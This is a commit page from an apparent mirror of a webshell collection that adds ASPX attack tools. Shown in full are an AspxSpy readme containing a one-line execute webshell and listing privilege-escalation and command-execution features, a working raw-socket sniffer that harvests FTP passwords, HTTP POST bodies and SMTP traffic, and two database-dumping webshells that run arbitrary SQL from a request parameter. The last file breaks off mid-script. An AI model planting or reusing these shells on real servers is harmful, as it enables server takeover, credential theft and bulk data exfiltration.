PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2026-02-07 14:06:35 +00:00
Code Issues Projects Releases Wiki Activity

update net-friend

Browse Source
This commit is contained in:
tennc
2013-06-20 09:50:18 +08:00
parent bb025735ea
commit 0b16c9f65f
95 changed files with 84948 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2941
net-friend/aspx/01.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1561
net-friend/aspx/1----环境检测功能非常不错.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1047
net-friend/aspx/1.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1561
net-friend/aspx/11.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

2949
net-friend/aspx/ASP.NET Web BackDoor.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

2941
net-friend/aspx/Aspx(免杀).aspx Normal file
View File

File diff suppressed because it is too large Load Diff

2588
net-friend/aspx/aspx.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1563
net-friend/aspx/aspxspy.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1563
net-friend/aspx/aspxspy/1.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1563
net-friend/aspx/aspxspy/aspxspy.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

33
net-friend/aspx/aspxspy/read.txt Normal file
View File

@@ -0,0 +1,33 @@
AspxSpy 1.0 Cody By Bin[20nt]
Readme:
1.开发环境VS2005 + C#兼容FrameWork1.1/2.0,基本实现代码分离。
2.密码为32位MD5加密(小写) 默认为 admin.
3.采用POST方式提交数据增强了隐蔽性。
4.添加了IIS探测功能遍历IIS站点信息。
5.增强了对文件属性的修改。
6.在SQLTools中增加了SA权限执行系统命令功能SQL_DIR 功能可以直接备份log/database到指定目录。
文件名为bin.asp Shell 为<%execute request("B")%>
7.增加了 Serv-u 提权功能.
8.可以对端口实现单线程扫描。
9.可以对注册表进行简单的读取.
PS: 先发布一个测试版本,有几个功能没有加上,有兴趣的朋友可以测试下估计很快就会被K发现BUG可以到www.rootkit.net.cn反馈.
E-mail : master@rootkit.net.net
感谢 Snailsor 的技术支持还有Fuyu对我的关怀祝大家新年快乐

33
net-friend/aspx/read.txt Normal file
View File

@@ -0,0 +1,33 @@
AspxSpy 1.0 Cody By Bin[20nt]
Readme:
1.开发环境VS2005 + C#兼容FrameWork1.1/2.0,基本实现代码分离。
2.密码为32位MD5加密(小写) 默认为 admin.
3.采用POST方式提交数据增强了隐蔽性。
4.添加了IIS探测功能遍历IIS站点信息。
5.增强了对文件属性的修改。
6.在SQLTools中增加了SA权限执行系统命令功能SQL_DIR 功能可以直接备份log/database到指定目录。
文件名为bin.asp Shell 为<%execute request("B")%>
7.增加了 Serv-u 提权功能.
8.可以对端口实现单线程扫描。
9.可以对注册表进行简单的读取.
PS: 先发布一个测试版本,有几个功能没有加上,有兴趣的朋友可以测试下估计很快就会被K发现BUG可以到www.rootkit.net.cn反馈.
E-mail : master@rootkit.net.net
感谢 Snailsor 的技术支持还有Fuyu对我的关怀祝大家新年快乐

707
net-friend/aspx/sniffer--aspx的嗅探工具.aspx Normal file
View File

@@ -0,0 +1,707 @@
<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Net.NetworkInformation" %>
<%@ Import Namespace="System.Threading" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>WebSniff 1.0 Powered by 上善若水 汉化版 </title>
</head>
<body>
<script runat="server">
static private Socket mainSocket; //The socket which captures all incoming packets
private static byte[] byteData = new byte[2048];
private static bool bContinueCapturing = true; //A flag to check if packets are to be captured or not
static int stoppackes = 0;
static int port = 0;
static string strIP = null;
static long packets = 0;
static System.IO.FileStream wfs;
static string logfile =null;
static PacketCaptureWriter pktwt;
static string keyword;
static DateTime stoptime = System.DateTime.Now.AddYears(-8);
static Thread th;
static int minisizepacket=0;
static string proException = null;
static Boolean logNextPacket = false;
static Boolean my_s_ftp= true;
static Boolean my_s_http_post = false;
static Boolean my_s_smtp = false;
protected void Page_Load(object sender, EventArgs e)
{
if (logfile == null)
{
logfile = Server.MapPath("w" + System.DateTime.Now.ToFileTime() + ".txt");
}
if (stoptime.Year == (System.DateTime.Now.Year - 8))
{
System.DateTime nextDay = System.DateTime.Now.AddDays(1);
stoptime = nextDay;
}
//没有生成IP列表
if (ddlist.Items.Count==0)
{
IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
if (HosyEntry.AddressList.Length > 0)
{
foreach (IPAddress ip in HosyEntry.AddressList)
{
ddlist.Items.Add(ip.ToString());
}
}
}
//如不是点击Starts按钮则打印已经设过的参数
if (Request.Form["Starts"] == null)
{
this.ddlist.SelectedValue = strIP;
this.txtport.Text = port.ToString();
this.txtMinisize.Text = minisizepacket.ToString();
this.txtkeywords.Text = keyword;
this.txtlogfile.Text = logfile;
this.txtpackets.Text = stoptime.ToString();
this.s_ftp.Checked = my_s_ftp;
this.s_http_post.Checked = my_s_http_post;
this.s_smtp.Checked = my_s_smtp;
}
if (th != null )
{
this.Lb_msg.Text = System.DateTime.Now.ToString()+" State: <b>" + th.ThreadState.ToString() +"</b> Packets: "+packets.ToString();
}
else
{
this.Lb_msg.Text = "嗅探还没有开始额";
}
if (Request.Form["Starts"] != null || th != null)
{
this.Starts.Enabled = false;
}
else
{
this.Starts.Enabled = true;
}
//点击了stop按钮
if (Request.Form["Button1"] != null)
{
this.Starts.Enabled = true;
this.Lb_msg.Text = System.DateTime.Now.ToString() + " State: <b>stoping. Click \"Refresh\" again to see if thread is stoped successed.</b> Packets: " + packets.ToString();
}
Lb_msg2.Text = proException; //错误信息
}
protected void Refresh_Click(object sender, EventArgs e)
{
}
protected void Stop_Click(object sender, EventArgs e)
{
packets = stoppackes;
//stoptime = System.DateTime.Now;
proException += "<br>last time stop at " + System.DateTime.Now.ToString();
bContinueCapturing = false;
if (th != null)
{
th.Abort();
th = null;
}
try
{
wfs.Close();
mainSocket.Close();
}
catch (Exception ex)
{
}
}
protected void Pagestart()
{
//记录设置过的参数
strIP = ddlist.SelectedValue;
port = Int32.Parse(txtport.Text);
stoptime = Convert.ToDateTime( txtpackets.Text);
logfile = this.txtlogfile.Text;
keyword = txtkeywords.Text;
minisizepacket = Int32.Parse(txtMinisize.Text);
my_s_ftp = this.s_ftp.Checked;
my_s_http_post = this.s_http_post.Checked;
my_s_smtp = this.s_smtp.Checked;
wfs = System.IO.File.Create(logfile);
pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
bContinueCapturing = true;
packets = 0;
Start();
}
private static void Start()
{
byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
byte[] byOut = new byte[4] { 1, 0, 0, 0 };
try
{
bContinueCapturing = true;
mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
}
catch (Exception ex)
{
proException += ex.ToString()+"<BR>"; //静态方法可以访问静态变量proException
}
byteData = new byte[2048];
while (System.DateTime.Now <= stoptime)
{
ParseData(byteData, mainSocket.Receive(byteData));
}
bContinueCapturing = false;
wfs.Close();
mainSocket.Close();
}
protected void Start_Click(object sender, EventArgs e)
{
if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
th = new Thread(new ThreadStart(Pagestart));
th.Start();
//Session["workthread"] = th;
this.Lb_msg.Text = "\r\nSniffing.Click \"Refresh\" to see the lastest status.";
}
public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
{
ushort u = 0;
if (Type == 0)
{
u = (ushort)ptr[Index++];
u *= 256;
u += (ushort)ptr[Index++];
}
else if (Type == 1)
{
u = (ushort)ptr[++Index];
u *= 256; Index--;
u += (ushort)ptr[Index++]; Index++;
}
return u;
}
private static void ParseData(byte[] byteData, int nReceived)
{
try
{
byte[] nbyte = new byte[nReceived];
Array.Copy(byteData, nbyte, nReceived);
if ((int)nbyte[9] == 6)
{
int sport = Get2Bytes(nbyte, 20,0);
int dport = Get2Bytes(nbyte, 22,0);
String datas=Encoding.Default.GetString(nbyte);
Boolean logIt=false;
if (my_s_ftp)
{
if ((sport == 21 || dport == 21) &&
(datas.IndexOf("USER ") >= 0 || datas.IndexOf("PASS ") >= 0)
)
{
logIt =true;
}
}
if (!logIt && my_s_http_post)
{
if(logNextPacket){
logIt =true;
logNextPacket=false;
}
if (!logIt && datas.IndexOf("POST ")>=0)
{
logIt =true;
logNextPacket=true;
}
}
if (!logIt && my_s_smtp && (dport == 25 || sport == 25))
{
logIt =true;
}
//判断端口
if (!logIt && (dport == port || sport == port))
{
if (nReceived > minisizepacket)
{
//判断关键字
if (keyword != "")
{
if (datas.IndexOf(keyword) >= 0)
{
logIt =true;
}
}
else
{
logIt =true;
}
}
}
if(logIt){
PacketCapture pkt = new PacketCapture(nbyte, nReceived);
pktwt.Write(pkt);
packets++;
}
}
}
catch { }
}
public struct UnixTime
{
public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
private readonly int _Value;
public UnixTime(int value)
{
if (value < 0)
throw new ArgumentOutOfRangeException("value");
_Value = value;
}
public int Value
{
get { return _Value; }
}
public DateTime ToDateTime()
{
const long START = 621355968000000000; // 1970-1-1 00:00:00
return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
}
public static UnixTime FromDateTime(DateTime dateTime)
{
if (dateTime < MinDateTime || dateTime > MaxDateTime)
throw new ArgumentOutOfRangeException("dateTime");
TimeSpan span = dateTime.Subtract(MinDateTime);
return new UnixTime((int)span.TotalSeconds);
}
public override string ToString()
{
return ToDateTime().ToString();
}
}
public enum LinkLayerType : uint
{
Null = 0,
Ethernet = 1,
RawIP = 101,
User0 = 147,
User1 = 148,
User2 = 149,
User3 = 150,
User4 = 151,
User5 = 152,
User6 = 153,
User7 = 154,
User8 = 155,
User9 = 156,
User10 = 157,
User11 = 158,
User12 = 159,
User13 = 160,
User14 = 161,
User15 = 162,
}
public sealed class PacketCaptureWriter
{
#region Fields
private const uint MAGIC = 0xA1B2C3D4;
private readonly Stream _BaseStream;
private readonly LinkLayerType _LinkLayerType;
private readonly int _MaxPacketLength;
private readonly BinaryWriter m_Writer;
private bool m_ExistHeader = false;
private int _TimeZone;
private int _CaptureTimestamp;
#endregion
#region Constructors
public PacketCaptureWriter(
Stream baseStream, LinkLayerType linkLayerType,
int maxPacketLength, int captureTimestamp)
{
if (baseStream == null) throw new ArgumentNullException("baseStream");
if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
_BaseStream = baseStream;
_LinkLayerType = linkLayerType;
_MaxPacketLength = maxPacketLength;
_CaptureTimestamp = captureTimestamp;
m_Writer = new BinaryWriter(_BaseStream);
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
: this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
{
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
: this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
{
}
#endregion
#region Properties
public short VersionMajor
{
get { return 2; }
}
public short VersionMinjor
{
get { return 4; }
}
public int TimeZone
{
get { return _TimeZone; }
set { _TimeZone = value; }
}
public int CaptureTimestamp
{
get { return _CaptureTimestamp; }
set { _CaptureTimestamp = value; }
}
public Stream BaseStream
{
get { return _BaseStream; }
}
public LinkLayerType LinkLaterType
{
get { return _LinkLayerType; }
}
public int MaxPacketLength
{
get { return _MaxPacketLength; }
}
#endregion
public void Write(PacketCapture packet)
{
CheckHeader();
m_Writer.Write(packet.Timestamp.Value);
m_Writer.Write(packet.Millseconds);
m_Writer.Write(packet.Packet.Count);
m_Writer.Write(packet.RawLength);
m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
}
public void Flush()
{
BaseStream.Flush();
}
private void CheckHeader()
{
if (!m_ExistHeader)
{
m_Writer.Write(MAGIC);
m_Writer.Write(VersionMajor);
m_Writer.Write(VersionMinjor);
m_Writer.Write(TimeZone);
m_Writer.Write(CaptureTimestamp);
m_Writer.Write(MaxPacketLength);
m_Writer.Write((uint)LinkLaterType);
m_ExistHeader = true;
}
}
}
public sealed class PacketCapture
{
private readonly UnixTime _Timestamp;
private readonly ArraySegment<byte> _Packet;
private readonly int _RawLength;
private readonly int _Millseconds;
public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
{
if (packet.Count > rawLength)
throw new ArgumentException("Length Error", "rawLength");
_Packet = packet;
_Timestamp = timestamp;
_RawLength = rawLength;
_Millseconds = millseconds;
}
public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
: this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(ArraySegment<byte> packet, int rawLength)
: this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(ArraySegment<byte> packet)
: this(packet, packet.Count)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(byte[] packetData)
: this(packetData, packetData.Length)
{
}
public ArraySegment<byte> Packet
{
get { return _Packet; }
}
public UnixTime Timestamp
{
get { return _Timestamp; }
}
public int Millseconds
{
get { return _Millseconds; }
}
public int RawLength
{
get { return _RawLength; }
}
}
</script>
<style type="text/css">
<!--
a {
color: #FF0000 ;text-decoration: none
}
#b
{
color: #336699;
font-size: 10pt;
text-align: right;
}
#tt
{
vertical-align: middle;
font-size: 12pt;
text-align: center;
}
#Ct_2
{
padding-left:30px;
font-size: 10pt;
color: #336699;
vertical-align: middle;
text-align: left;
background-color: aliceblue;
border-width: 1px;
border-style: solid;
border-color: -moz-use-text-color;
padding-bottom:10px;
}
-->
</style>
<form id="form1" runat="server">
<div id="tt"> <b> WebSniff 1.0</b><br /><br /> </div>
<div id="Ct_2" >
<table width="100%" >
<tr >
<td width="10%"> 目标IP: </td>
<td ><asp:DropDownList ID="ddlist" runat="server" width="90%"></asp:DropDownList></td>
</tr>
<tr >
<td width="10%">自动嗅探: </td>
<td >
FTP 密码:
<asp:CheckBox ID="s_ftp" runat="server" Checked />
&nbsp;&nbsp;
HTTP Post Data:
<asp:CheckBox ID="s_http_post" runat="server" />
&nbsp;&nbsp;
Smtp Data:
<asp:CheckBox ID="s_smtp" runat="server" />
</td>
</tr>
<tr>
<td ">
目标端口:
</td>
<td>
<asp:TextBox ID="txtport" Text="0" width="90%" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td >
数据包大小:
</td>
<td >
<asp:TextBox ID="txtMinisize" Text="0" width="90%" runat="server" ></asp:TextBox>
</td>
</tr>
<tr>
<td>
关键字如passwd):
</td>
<td>
<asp:TextBox ID="txtkeywords" runat="server" width="90%" Text=""></asp:TextBox>
</td>
</tr>
<tr>
<td >
数据包文件存放位置:
</td>
<td>
<asp:TextBox ID="txtlogfile" runat="server" width="90%" Text="log.log" ></asp:TextBox>
</td>
</tr>
<tr>
<td >
定时停止:
</td>
<td>
<asp:TextBox ID="txtpackets" runat="server" width="90%" Text="300"></asp:TextBox>
</td>
</tr>
<tr>
<td >
控制:
</td>
<td width="90%" > <asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="开始" />
<asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="停止" />
<asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="保存" /><br />
</td>
</tr>
<tr>
<td >
Status:
</td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label>
</td>
</tr>
<tr>
<td >
</td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg2" runat="server" Text=""></div></asp:Label>
</td>
</tr>
</table>
</div><br /><br />
<div id=b>Powered by <a href="//user.qzone.qq.com/356497021"> 上善若水 </a>|汉化
<a href=" http://user.qzone.qq.com/356497021">1</a>
<a href="http://user.qzone.qq.com/356497021">2</a>
</div>
</form>
</body>
</html>

1686
net-friend/aspx/view.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1047
net-friend/aspx/干净清爽的大马,不怎么好用.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

573
net-friend/aspx/脱裤4ngle.aspx Normal file
View File

@@ -0,0 +1,573 @@
<%@ Page Language=”C#” %>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“>
<script runat=”server”>
protected void Button1_Click(object sender, EventArgs e)
{
string serverIP=txtServerIP.Text;
string database=txtDatabase.Text;
string user=txtUser.Text;
string pass=txtPass.Text;
string tableName=txtTableName.Text;
string colName=txtColName.Text;
string fileName=txtFileName.Text;
if (serverIP != null & database != null & user != null & pass != null & tableName != null & fileName != null)
{
string connectionString = “server=”+serverIP+”;database=”+database+”;uid=”+user+”;pwd=”+pass;
System.Data.SqlClient.SqlConnection connection = new System.Data.SqlClient.SqlConnection(connectionString);
try
{
connection.Open();
string sqlStr = “select * from “+tableName;
if (colName!=”")
{
sqlStr = “select ” + colName + ” from ” + tableName;
}
System.Data.DataSet ds = new System.Data.DataSet();
System.Data.SqlClient.SqlCommand cmd = new System.Data.SqlClient.SqlCommand(sqlStr, connection);
System.Data.SqlClient.SqlDataAdapter da = new System.Data.SqlClient.SqlDataAdapter(cmd);
da.Fill(ds);
System.Data.DataTable dataTable = ds.Tables[0];
if (dataTable.Rows.Count==0)
{
lblInfo.Text = “没有需要导出的数据!”;
lblInfo.ForeColor = System.Drawing.Color.Blue;
return;
}
string filePath = System.IO.Path.GetDirectoryName(Server.MapPath(“DataOutExl.aspx”))+”\\DataOut“;
if (!System.IO.Directory.Exists(filePath))
{
System.IO.Directory.CreateDirectory(filePath);
}
bool outType = RadioButton1.Checked;
int sum = dataTable.Rows.Count;
int count = 1;
int size = 0;
int tmpNum = 1;
if (txtNum.Text!=”")
{
size = int.Parse(txtNum.Text);
count = sum / size+1;
}
for (int z = 0; z < count; z++)
{
Button1.Text = “正在导出..”;
Button1.Enabled = false;
lblInfo.Text = “正在导出第”+(z+1)+”组数据,共”+count+”组数据”;
lblInfo.ForeColor = System.Drawing.Color.Blue;
System.IO.StreamWriter file = new System.IO.StreamWriter(filePath+”\\” + (z+1) +”_”+fileName, false, Encoding.UTF8);
bool isFirst = true;
if (outType)
{
file.Write(@”<html><head><meta http-equiv=content-type content=text/html; charset=UNICODE>
<style>*{font-size:12px;}table{background:#DDD;border:solid 2px #CCC;}td{background:#FFF;}
.th td{background:#EEE;font-weight:bold;height:28px;color:#008;}
div{border:solid 1px #DDD;background:#FFF;padding:3px;color:#00B;}</style>
<title>Export Table</title></head><body>”);
file.Write(“<table border=0 cellspacing=1 cellpadding=3>”);
}
for (int i = size*z; i < dataTable.Rows.Count; i++)
{
System.Data.DataRow dataRow = dataTable.Rows[i];
if (isFirst)
{
if ( outType)
{
file.Write(“<tr class=th>”);
}
for (int j = 0; j < dataTable.Columns.Count; j++)
{
if (outType)
{
file.Write(“<td>”);
}
file.Write(dataTable.Columns[j].ColumnName + “ “);
if (outType)
{
file.Write(“</td>”);
}
}
if (outType)
{
file.Write(“</tr>”);
}
isFirst = false;
}
if (outType)
{
file.Write(“<tr>”);
}
else
{
file.WriteLine(” “);
}
for (int k = 0; k < dataTable.Columns.Count; k++)
{
if (outType)
{
file.Write(“<td>”);
}
file.Write(dataTable.Rows[i][k] + “ “);
if (outType)
{
file.Write(“</td>”);
}
}
if (outType)
{
file.Write(“<tr>”);
}
else
{
file.WriteLine(” “);
}
if (tmpNum==size)
break;
tmpNum += 1;
}
if (outType)
{
file.Write(“</table>”);
file.Write(“<br /><div>执行成功!返回” + tmpNum + “行</div>”);
file.Write(“</body></html>”);
}
else
{
file.WriteLine(“执行成功!返回” + tmpNum + “行!”);
}
file.Dispose();
file.Close();
tmpNum = 1;
}
lblInfo.Text = “导出成功!”;
lblInfo.ForeColor = System.Drawing.Color.Blue;
Button1.Enabled = true;
Button1.Text = “开始导出”;
}
catch (Exception ex)
{
lblInfo.Text = “导出失败!” + ex.Message;
lblInfo.ForeColor = System.Drawing.Color.Red;
}finally
{
connection.Close();
}
}
else
{
lblInfo.Text = “请先填写相关的连接信息!”;
lblInfo.ForeColor = System.Drawing.Color.Red;
}
}
</script>
<html xmlns=”http://www.w3.org/1999/xhtml“>
<head runat=”server”>
<title>无标题页</title>
<style type=”text/css”>
.style1
{
width: 61%;
}
.style2
{
height: 23px;
}
</style>
</head>
<body>
<form id=”form1″ runat=”server”>
<div>
<table>
<tr>
<td colspan=”2″ align=center>
SQL Server 数据导出&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
友情链接:<a href=”http://hi.baidu.com/5427518“>情Blog</a></td>
</tr>
<tr>
<td>
服务器IP:</td>
<td>
<asp:TextBox ID=”txtServerIP” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
数据库:</td>
<td>
<asp:TextBox ID=”txtDatabase” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
用户名:</td>
<td>
<asp:TextBox ID=”txtUser” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
密码:</td>
<td>
<asp:TextBox ID=”txtPass” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
表名:</td>
<td>
<asp:TextBox ID=”txtTableName” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
列名:</td>
<td>
<asp:TextBox ID=”txtColName” runat=”server” Width=”172px”></asp:TextBox>
&nbsp; 列名之间请用‘,’分开,不写代表全部</td>
</tr>
<tr>
<td>
分组行数:</td>
<td>
<asp:TextBox ID=”txtNum” runat=”server” Width=”172px”></asp:TextBox>
&nbsp; 对于数据多的时候可以使用</td>
</tr>
<tr>
<td>
保存文件名:</td>
<td>
<asp:TextBox ID=”txtFileName” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
文件格式:</td>
<td>
<asp:RadioButton ID=”RadioButton1″ runat=”server” GroupName=”type” Checked=”true” Text=”html” />
&nbsp; &nbsp; &nbsp; &nbsp;
<asp:RadioButton ID=”RadioButton2″ runat=”server” GroupName=”type” Text=”txt” />
</td>
</tr>
<tr>
<td colspan=”2″ align=”center”>
<asp:Button ID=”Button1″ runat=”server” Text=”开始导出” onclick=”Button1_Click” />
</td>
</tr>
<tr>
<td colspan=”2″>
<asp:Label ID=”lblInfo” runat=”server” Text=”"></asp:Label>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
=======================================================
涮库webshell之二
<%@ Page Language=”C#” %>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“>
<script runat=”server”>
protected void Page_Load(object sender, EventArgs e)
{
//if (Request["sub"] != null && Request["sub"] == “submit”)
//{
// GridView1.Visible = true;
// //System.Web.HttpContext.Current.Response.Write(DropDownList1.SelectedIndex);
// if (DropDownList1.SelectedIndex == 0)
// {
// using (System.Data.Odbc.OdbcConnection conn = new System.Data.Odbc.OdbcConnection(Request["conn"]))
// {
// conn.Open();
// System.Data.Odbc.OdbcCommand comm = new System.Data.Odbc.OdbcCommand(Request["sql"], conn);
// System.Data.Odbc.OdbcDataAdapter ad = new System.Data.Odbc.OdbcDataAdapter();
// ad.SelectCommand = comm;
// System.Data.DataSet ds = new System.Data.DataSet();
// ad.Fill(ds);
// GridView1.DataSource = ds;
// GridView1.DataBind();
// }
// }
// if (DropDownList1.SelectedIndex == 2)
// {
// using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(Request["conn"]))
// {
// conn.Open();
// System.Data.SqlClient.SqlCommand comm = new System.Data.SqlClient.SqlCommand(Request["sql"], conn);
// System.Data.SqlClient.SqlDataAdapter ad = new System.Data.SqlClient.SqlDataAdapter();
// ad.SelectCommand = comm;
// System.Data.DataSet ds = new System.Data.DataSet();
// ad.Fill(ds);
// GridView1.DataSource = ds;
// GridView1.DataBind();
// }
// }
// if (DropDownList1.SelectedIndex == 1)
// {
// using (System.Data.OleDb.OleDbConnection conn = new System.Data.OleDb.OleDbConnection(Request["conn"]))
// {
// conn.Open();
// System.Data.OleDb.OleDbCommand comm = new System.Data.OleDb.OleDbCommand(Request["sql"], conn);
// System.Data.OleDb.OleDbDataAdapter ad = new System.Data.OleDb.OleDbDataAdapter();
// ad.SelectCommand = comm;
// System.Data.DataSet ds = new System.Data.DataSet();
// ad.Fill(ds);
// GridView1.DataSource = ds;
// GridView1.DataBind();
// }
// }
//}
}
protected void DropDownList1_SelectedIndexChanged(object sender, EventArgs e)
{
connT.Text = DropDownList1.SelectedValue.ToString();
GridView1.Visible = false;
DropDownList2.Items.Clear();
}
protected void Button1_Click(object sender, EventArgs e)
{
if (DropDownList1.SelectedIndex == 0)
{
using (System.Data.Odbc.OdbcConnection conn = new System.Data.Odbc.OdbcConnection(connT.Text.ToString()))
//using (System.Data.OleDb.OleDbConnection conn = new System.Data.OleDb.OleDbConnection(connT.Text.ToString()))
{
conn.Open();
System.Data.DataTable dt = conn.GetSchema(“Tables”);
//GridView1.DataSource = dt;
//GridView1.DataBind();
//GridView1.Visible = true;
//DropDownList2.DataSource = dt.Select(“TABLE_TYPE=TABLE”);
//DropDownList2.DataValueField = “TABLE_NAME”;
//DropDownList2.DataTextField = “TABLE_NAME”;
//DropDownList2.DataBind();
DropDownList2.Items.Clear();
foreach (System.Data.DataRow item in dt.Select(“TABLE_TYPE=TABLE”))
{
DropDownList2.Items.Add(new ListItem(item["TABLE_NAME"].ToString(), item["TABLE_NAME"].ToString()));
}
}
}
if (DropDownList1.SelectedIndex == 1)
{
using (System.Data.OleDb.OleDbConnection conn = new System.Data.OleDb.OleDbConnection(connT.Text.ToString()))
{
conn.Open();
System.Data.DataTable dt = conn.GetSchema(“Tables”);
//GridView1.DataSource = dt;
//GridView1.DataBind();
//GridView1.Visible = true;
//DropDownList2.DataSource = dt.Select(“TABLE_TYPE=TABLE”);
//DropDownList2.DataValueField = “TABLE_NAME”;
//DropDownList2.DataTextField = “TABLE_NAME”;
//DropDownList2.DataBind();
DropDownList2.Items.Clear();
foreach (System.Data.DataRow item in dt.Select(“TABLE_TYPE=TABLE”))
{
DropDownList2.Items.Add(new ListItem(item["TABLE_NAME"].ToString(), item["TABLE_NAME"].ToString()));
}
}
}
if (DropDownList1.SelectedIndex == 2)
{
using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(connT.Text.ToString()))
{
conn.Open();
System.Data.SqlClient.SqlCommand comm = new System.Data.SqlClient.SqlCommand(“select name from sysobjects where type=U'”, conn);
//System.Data.SqlClient.SqlDataReader dr = comm.ExecuteReader();
//string UserTable = “”;
//while (dr.Read())
//{
// UserTable = (string)dr[0];
// DropDownList2.Items.Add(UserTable);
//}
System.Data.SqlClient.SqlDataAdapter ad = new System.Data.SqlClient.SqlDataAdapter();
ad.SelectCommand = comm;
System.Data.DataSet ds = new System.Data.DataSet();
ad.Fill(ds);
DropDownList2.DataSource = ds;
DropDownList2.DataTextField = “name”;
DropDownList2.DataValueField = “name”;
DropDownList2.DataBind();
}
}
}
protected void Button2_Click(object sender, EventArgs e)
{
string provoder = “”;
if (DropDownList1.SelectedIndex == 1)
provoder = “System.Data.OleDb”;
else if (DropDownList1.SelectedIndex == 2)
provoder = “System.Data.SqlClient”;
else if (DropDownList1.SelectedIndex ==0)
{
provoder = “System.Data.Odbc”;
}
System.Data.Common.DbProviderFactory factory = System.Data.Common.DbProviderFactories.GetFactory(provoder);
System.Data.Common.DbConnection conn=factory.CreateConnection() ;
conn.ConnectionString = connT.Text;
conn.Open();
System.Data.Common.DbCommand comm = conn.CreateCommand();
comm.CommandText = Request["sql"];
System.Data.Common.DbDataReader dr= comm.ExecuteReader();
GridView1.DataSource = dr;
GridView1.DataBind();
GridView1.Visible = true;
dr.Close();
comm.Dispose();
conn.Close();
}
</script>
<html xmlns=”http://www.w3.org/1999/xhtml“>
<head runat=”server”>
<title></title>
<script language=”javascript” type=”text/javascript”>
